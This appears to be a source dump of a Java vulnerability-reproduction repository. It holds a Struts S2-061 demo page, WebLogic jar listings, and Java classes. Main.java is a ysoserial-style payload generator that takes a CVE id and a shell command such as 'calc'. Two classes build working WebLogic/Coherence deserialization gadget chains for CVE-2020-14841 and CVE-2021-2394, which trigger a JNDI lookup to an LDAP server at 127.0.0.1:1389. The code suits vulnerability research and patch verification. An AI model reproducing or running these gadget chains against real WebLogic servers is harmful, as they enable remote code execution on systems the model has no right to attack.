contentType="text/html; charset=UTF-8" 4 | pageEncoding="UTF-8" %> 5 | <%@ taglib prefix="s" uri="/struts-tags" %> 6 | 7 | 8 | 9 | S2-061 demo 10 | 11 | 12 | 13 | your input id: ${id} 14 |
has been evaluated again in id attribute 15 |
16 | 17 | -------------------------------------------------------------------------------- /weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/aopalliance-repackaged-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-20.12.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-20.12.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-management-20.12.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-management-20.12.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-rest.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-rest.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/coherence-web.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/coherence-web.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/eclipselink.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/eclipselink.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-api-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-api-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-locator-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-locator-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/hk2-utils-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/hk2-utils-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-annotations-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-annotations-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-core-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-core-2.12.0.jar 
-------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-databind-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-databind-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-base-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-jaxrs-json-provider-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jackson-module-jaxb-annotations-2.12.0.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.activation-1.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-1.2.1.jar -------------------------------------------------------------------------------- 
/weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.activation-api-1.2.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.annotation-api-1.3.5.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.inject-2.6.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.inject-2.6.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.validation-api-2.0.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.ws.rs-api-2.1.6.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jakarta.xml.bind-api-2.3.2.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/javassist-3.25.0-GA.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/javassist-3.25.0-GA.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-client-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-client-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-common-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-common-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-entity-filtering-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-hk2-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-hk2-2.30.1.jar 
-------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-jaxb-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-media-json-jackson-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/jersey-server-2.30.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/jersey-server-2.30.1.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/osgi-resource-locator-1.0.3.jar -------------------------------------------------------------------------------- /weblogic/lib/jar_files/toplink-grid.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/jar_files/toplink-grid.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/coherence.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/coherence.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-cli-1.4.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-cli-1.4.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-codec-1.15.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-codec-1.15.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-collections-3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-collections-3.1.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-httpclient-3.1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-httpclient-3.1.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-io-2.7.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-io-2.7.jar 
-------------------------------------------------------------------------------- /weblogic/lib/weblogic/commons-logging-1.2.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/commons-logging-1.2.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/jsafeFIPS.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/jsafeFIPS.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/wlcipher.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlcipher.jar -------------------------------------------------------------------------------- /weblogic/lib/weblogic/wlfullclient.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/lib/weblogic/wlfullclient.jar -------------------------------------------------------------------------------- /weblogic/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | weblogic 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 6 20 | 6 21 | 22 | 23 | 24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /weblogic/src/main/java/com/r17a/weblogic/Main.java: -------------------------------------------------------------------------------- 1 | package 
com.r17a.weblogic;

import com.r17a.weblogic.cve.ObjectPayload;

/**
 * Command-line entry point that maps a CVE identifier to a class name and runs that class as an
 * {@link ObjectPayload}.
 */
public class Main {
    // Declared but not referenced anywhere in this file.
    private static final int INTERNAL_ERROR_CODE = 70;
    // Exit status used when the argument count is not exactly two.
    private static final int USAGE_CODE = 64;

    /**
     * Reads a CVE id and a command string from {@code args}, loads the class named
     * {@code "weblogic.cve." + cveIdDeal(cveId)} and calls {@code getSerFile(cmd)} on a new
     * instance of it. Any exception is printed to standard output and not rethrown.
     *
     * @param args exactly two elements: the CVE id and the command string
     */
    public static void main(final String[] args) {
        if (args.length != 2) {
            printUsage();
            System.exit(USAGE_CODE);
        }
        final String cveId = args[0];
        final String cmd = args[1];
        // String cveId = "CVE-2021-2135";
        // String cmd = "calc";

        try {
            // The class name is derived from the first argument and resolved reflectively.
            String className = "weblogic.cve." + cveIdDeal(cveId);
            final Class clazz = (Class) Class.forName(className);
            ObjectPayload o = clazz.newInstance();
            o.getSerFile(cmd);
        }catch (Exception e){
            System.out.println(e);
        }
    }

    /**
     * Turns a CVE id into class-name form.
     *
     * @param cveId identifier such as {@code CVE-2020-2555}
     * @return the id with every '-' replaced by '_' and upper-cased
     */
    private static String cveIdDeal(String cveId){
        if (cveId.contains("-")) {
            // Replace '-' with '_', e.g. CVE-2020-2555 -> CVE_2020_2555
            cveId = cveId.replace("-","_");
        }
        cveId = cveId.toUpperCase();
        return cveId;
    }

    /** Prints the banner and the two usage lines to standard error. */
    private static void printUsage() {
        System.err.println("Y SO SERIAL?");
        System.err.println("Usage: java -jar ysoserial-[version]-all.jar [cveid] '[command]'");
        System.err.println("eg: java -jar ysoserial-[version]-all.jar 'CVE-2021-2135' 'calc'");
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/cve/CVE_2020_14841.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.cve;

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;

import java.io.*;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

/**
 * Local reproduction for the deserialization issue named in the class name.
 * <p>
 * {@code main} builds a {@link PriorityQueue} ordered by an {@code ExtractorComparator} that
 * wraps a {@code LockVersionExtractor}, writes the queue to {@code E:\test.ser} and reads the
 * file back in the same JVM, so the behaviour of {@code readObject()} on that object graph can
 * be observed locally.
 * <p>
 * For defenders: the graph is assembled only from classes imported above, i.e. classes already
 * present on the classpath, so the relevant controls are the vendor patch and a deserialization
 * allow-list (JEP 290 / {@code ObjectInputFilter}) rather than inspection of the payload bytes.
 */
public class CVE_2020_14841 {
    /**
     * Builds the object graph, serializes it to a fixed file and deserializes it again.
     *
     * @param args not used
     * @throws Exception on any reflection or I/O failure
     */
    public static void main(String[] args) throws Exception {
        // JdbcRowSetImpl whose data source name is an LDAP URL on the loopback address
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        jdbcRowSet.setDataSourceName("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com");

        // Accessor configured with the name of a getter on the row set
        MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
        methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
        methodAttributeAccessor.setIsWriteOnly(true);
        methodAttributeAccessor.setAttributeName("xxx");

        LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "xxx");

        ExtractorComparator comparator = new ExtractorComparator(extractor);
        PriorityQueue queue = new PriorityQueue(2, comparator);


        // The backing array and the size are written through reflection instead of add();
        // presumably so the comparator is not invoked while the queue is being built.
        Object[] q = new Object[]{jdbcRowSet, 1};
        Field queueField = queue.getClass().getDeclaredField("queue");
        queueField.setAccessible(true);
        queueField.set(queue, q);
        Field sizeField = queue.getClass().getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(queue, 2);

        // Write the graph to a fixed path ...
        FileOutputStream fileOutputStream = new FileOutputStream(new File("E:\\test.ser"));
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
        objectOutputStream.writeObject(queue);

        // ... and read it straight back. NOTE(review): none of the four streams is closed.
        FileInputStream fileInputStream = new FileInputStream(new File("E:\\test.ser"));
        ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
        objectInputStream.readObject();
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/cve/CVE_2021_2394.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.cve;


import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.coherence.rest.util.extractor.MvelExtractor;
import com.tangosol.coherence.servlet.AttributeHolder;
import com.tangosol.util.aggregator.TopNAggregator;
import oracle.eclipselink.coherence.integrated.internal.querying.FilterExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/**
 * Local reproduction for the deserialization issue named in the class name.
 * <p>
 * {@code main} places a {@code TopNAggregator.PartialResult} inside an {@code AttributeHolder},
 * swaps the result's comparator for a {@code FilterExtractor} through reflection, writes the
 * holder to {@code E:\test.ser} and reads the file back in the same JVM.
 * <p>
 * For defenders: as with other gadget-style graphs, only classes already on the classpath are
 * involved, so the vendor patch and a deserialization allow-list (JEP 290 /
 * {@code ObjectInputFilter}) are the controls to verify.
 */
public class CVE_2021_2394 {
    /**
     * Builds the object graph, serializes it to a fixed file and deserializes it again.
     * Every exception is caught and its stack trace printed.
     *
     * @param args not used
     */
    public static void main(String[] args) {
        try{
            JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
            jdbcRowSet.setDataSourceName("ldap://127.0.0.1:1389/cn=foo,dc=example,dc=com");

            // jdbcRowSet.getDatabaseMetaData indirectly calls lookup
            MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
            methodAttributeAccessor.setGetMethodName("connect");
            methodAttributeAccessor.setSetMethodName("setConnection");
            methodAttributeAccessor.setAttributeName("xxx");

            FilterExtractor filterExtractor = new FilterExtractor();
            filterExtractor.setAccessor(methodAttributeAccessor);

            // Constructed with an empty expression; it is replaced as comparator below.
            MvelExtractor mvelExtractor = new MvelExtractor("");

            TopNAggregator.PartialResult sortedBag = new TopNAggregator.PartialResult(mvelExtractor, 2);
            AttributeHolder attributeHolder = new AttributeHolder();
            sortedBag.add(jdbcRowSet);

            // The comparator field lives on the superclass of PartialResult.
            Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField("m_comparator");
            m_comparator.setAccessible(true);
            m_comparator.set(sortedBag, filterExtractor);

            // setInternalValue is not public, hence the reflective call.
            Method setInternalValue = attributeHolder.getClass().getDeclaredMethod("setInternalValue", Object.class);
            setInternalValue.setAccessible(true);
            setInternalValue.invoke(attributeHolder, sortedBag);

            // Write the graph to a fixed path ...
            FileOutputStream fileOutputStream = new FileOutputStream(new File("E:\\test.ser"));
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
            objectOutputStream.writeObject(attributeHolder);

            // ... and read it straight back. NOTE(review): none of the four streams is closed.
            FileInputStream fileInputStream = new FileInputStream(new File("E:\\test.ser"));
            ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
            objectInputStream.readObject();
        }catch (Exception e){
            e.printStackTrace();
        }

    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/cve/ObjectPayload.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.cve;

/**
 * Contract that {@code Main} invokes on the class it resolves from the CVE id.
 */
public interface ObjectPayload {
    /**
     * Called with the command string taken from the command line.
     * Judging by the name, an implementation writes a serialized file; no implementation is
     * visible in this listing, so confirm against the implementing classes.
     *
     * @param cmd command string passed through from {@code Main}
     */
    void getSerFile(String cmd);
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/payload/PayloadTest.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.payload;

import com.r17a.weblogic.supeream.serial.BytesOperation;

/**
 * Created by nike on 17/7/3.
 * <p>
 * Scratch program: prints the hex dump of a compiled class file read from a hard-coded path and
 * then loads {@code com.supeream.payload.RemoteImpl} by name.
 */
public class PayloadTest {
    /**
     * @param args not used
     * @throws Exception if the file cannot be read or the class cannot be found
     */
    public static void main(String[] args) throws Exception {
        // byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/IRemote.class");
        // System.out.println(BytesOperation.bytesToHexString(iRemoteCode));
        //DefiningClassLoader definingClassLoader = new DefiningClassLoader();
        // Class cls = definingClassLoader.defineClass("com.com.supeream.payload.IRemote",iRemoteCode);
        // The path is specific to the original author's machine.
        byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/com.supeream/payload/RemoteImpl.class");
        System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl));

        // Class cls_ = definingClassLoader.defineClass("com.com.supeream.payload.RemoteImpl", remoteCodeImpl);
        Class.forName("com.supeream.payload.RemoteImpl");
        // System.out.println(cls_);
    }
}

--------------------------------------------------------------------------------
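/weblogic/src/main/java/com/r17a/weblogic/supeream/serial/BytesOperation.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.serial;

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;

/**
 * Byte-array helpers: hex encoding and decoding, concatenation and whole-file reads.
 */
public class BytesOperation {


    /**
     * Decodes a hexadecimal string (upper or lower case) into bytes.
     *
     * @param hexString hex digits, two per byte
     * @return the decoded bytes, or {@code null} when {@code hexString} is null or empty
     * @throws IllegalArgumentException if the length is odd or a character is not a hex digit;
     *         both cases used to yield silently corrupted output
     */
    public static byte[] hexStringToBytes(String hexString) {
        if (hexString == null || hexString.equals("")) {
            return null;
        }
        if (hexString.length() % 2 != 0) {
            throw new IllegalArgumentException("hex string has odd length: " + hexString.length());
        }
        byte[] decoded = new byte[hexString.length() / 2];
        for (int i = 0; i < decoded.length; ++i) {
            int pos = i * 2;
            decoded[i] = (byte) (charToByte(hexString.charAt(pos)) << 4 | charToByte(hexString.charAt(pos + 1)));
        }
        return decoded;
    }

    /**
     * Maps one hex digit to its value 0..15.
     *
     * @throws IllegalArgumentException if {@code c} is not a hex digit
     */
    private static byte charToByte(char c) {
        // Character.toUpperCase(char) does not depend on the default locale.
        int value = "0123456789ABCDEF".indexOf(Character.toUpperCase(c));
        if (value < 0) {
            throw new IllegalArgumentException("not a hex digit: '" + c + "'");
        }
        return (byte) value;
    }

    /**
     * Concatenates two arrays.
     *
     * @param byte_1 first part
     * @param byte_2 second part
     * @return a new array holding {@code byte_1} followed by {@code byte_2}
     */
    public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
        byte[] byte_3 = new byte[byte_1.length + byte_2.length];
        System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
        System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
        return byte_3;
    }

    /**
     * Encodes bytes as lower-case hex, two digits per byte.
     *
     * @param src bytes to encode
     * @return the hex string, or {@code null} when {@code src} is null or empty
     */
    public static String bytesToHexString(byte[] src) {
        if (src == null || src.length <= 0) {
            return null;
        }
        StringBuilder hex = new StringBuilder(src.length * 2);
        for (int i = 0; i < src.length; i++) {
            String digits = Integer.toHexString(src[i] & 0xFF);
            if (digits.length() < 2) {
                hex.append(0);
            }
            hex.append(digits);
        }
        return hex.toString();
    }

    /**
     * Reads a whole file into memory.
     * <p>
     * Reads in chunks until end of file, so an empty file yields an empty array (it used to
     * fail with a negative array size), short reads no longer truncate the result, files are
     * not capped at the former fixed buffer size, and the stream is closed even when a read
     * fails.
     *
     * @param FilePath path of the file to read
     * @return the file's content
     * @throws Exception if the file cannot be opened or read
     */
    public static byte[] GetByteByFile(String FilePath) throws Exception {
        FileInputStream in = new FileInputStream(FilePath);
        try {
            ByteArrayOutputStream collected = new ByteArrayOutputStream();
            byte[] chunk = new byte[8192];
            int read;
            while ((read = in.read(chunk)) != -1) {
                collected.write(chunk, 0, read);
            }
            return collected.toByteArray();
        } finally {
            in.close();
        }
    }

    /** Prints the hex dump of a jar at a hard-coded, author-specific path. */
    public static void main(String[] args) throws Exception {
        System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
    }
}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/serial/Reflections.java:
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.serial;

import java.lang.reflect.Constructor;
import java.lang.reflect.Field;

/**
 * Reflection shortcuts for reading and writing fields regardless of their access modifier.
 */
public class Reflections {

    /**
     * Finds a field declared on {@code clazz} or on one of its superclasses and makes it
     * accessible.
     * <p>
     * {@code getDeclaredField} signals a missing field with {@link NoSuchFieldException}, never
     * with {@code null}, so the superclass walk has to happen in the catch branch.
     *
     * @param clazz     class to start the search at
     * @param fieldName name of the field
     * @return the accessible field
     * @throws Exception {@link NoSuchFieldException} when no class in the hierarchy declares it
     */
    public static Field getField(final Class clazz, final String fieldName) throws Exception {
        if (clazz == null) {
            throw new NullPointerException("clazz");
        }
        NoSuchFieldException notFound = null;
        for (Class current = clazz; current != null; current = current.getSuperclass()) {
            try {
                Field field = current.getDeclaredField(fieldName);
                field.setAccessible(true);
                return field;
            } catch (NoSuchFieldException e) {
                // Report the failure for the class the caller asked about.
                if (notFound == null) {
                    notFound = e;
                }
            }
        }
        throw notFound;
    }

    /**
     * Sets the named field of {@code obj} to {@code value}.
     *
     * @throws Exception if the field is missing or cannot be written
     */
    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    /**
     * Returns the value of the named field of {@code obj}.
     *
     * @throws Exception if the field is missing or cannot be read
     */
    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        return field.get(obj);
    }

    /**
     * Returns element 0 of {@code getDeclaredConstructors()} for the named class, made
     * accessible. The reflection API does not specify the order of that array, so the result
     * is only well defined for classes with a single constructor.
     *
     * @throws Exception if the class cannot be loaded or declares no constructor
     */
    public static Constructor getFirstCtor(final String name) throws Exception {
        final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        return ctor;
    }

}

--------------------------------------------------------------------------------
/weblogic/src/main/java/com/r17a/weblogic/supeream/serial/Serializables.java: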
--------------------------------------------------------------------------------
package com.r17a.weblogic.supeream.serial;

import java.io.*;

/**
 * Thin wrappers around Java native serialization ({@link ObjectOutputStream} and
 * {@link ObjectInputStream}).
 */
public class Serializables {

    /**
     * Serializes {@code obj} into a new byte array.
     *
     * @param obj object to write
     * @return the serialized form
     * @throws IOException if writing fails
     */
    public static byte[] serialize(final Object obj) throws IOException {
        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        serialize(obj, out);
        return out.toByteArray();
    }

    /**
     * Writes {@code obj} to {@code out}, then flushes and closes the object stream, which also
     * closes {@code out}.
     *
     * @param obj object to write
     * @param out destination stream; closed on return
     * @throws IOException if writing fails
     */
    public static void serialize(final Object obj, final OutputStream out) throws IOException {
        final ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();
    }

    /**
     * Deserializes one object from a byte array; see {@link #deserialize(InputStream)}.
     *
     * @param serialized bytes produced by native serialization
     * @return the restored object
     * @throws IOException            if the bytes cannot be read as an object stream
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     */
    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        return deserialize(in);
    }

    /**
     * Reads one object from {@code in} with a plain {@link ObjectInputStream}.
     * <p>
     * NOTE(review): no class filter is installed, so this is only safe on bytes the caller
     * produced itself. Restoring untrusted input this way lets the stream choose which
     * classes run their deserialization logic; code that must accept external data needs an
     * allow-list filter (JEP 290) or a non-native format.
     *
     * @param in stream positioned at a serialized object; not closed by this method
     * @return the restored object
     * @throws ClassNotFoundException if a class in the stream is not on the classpath
     * @throws IOException            if the stream cannot be read
     */
    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
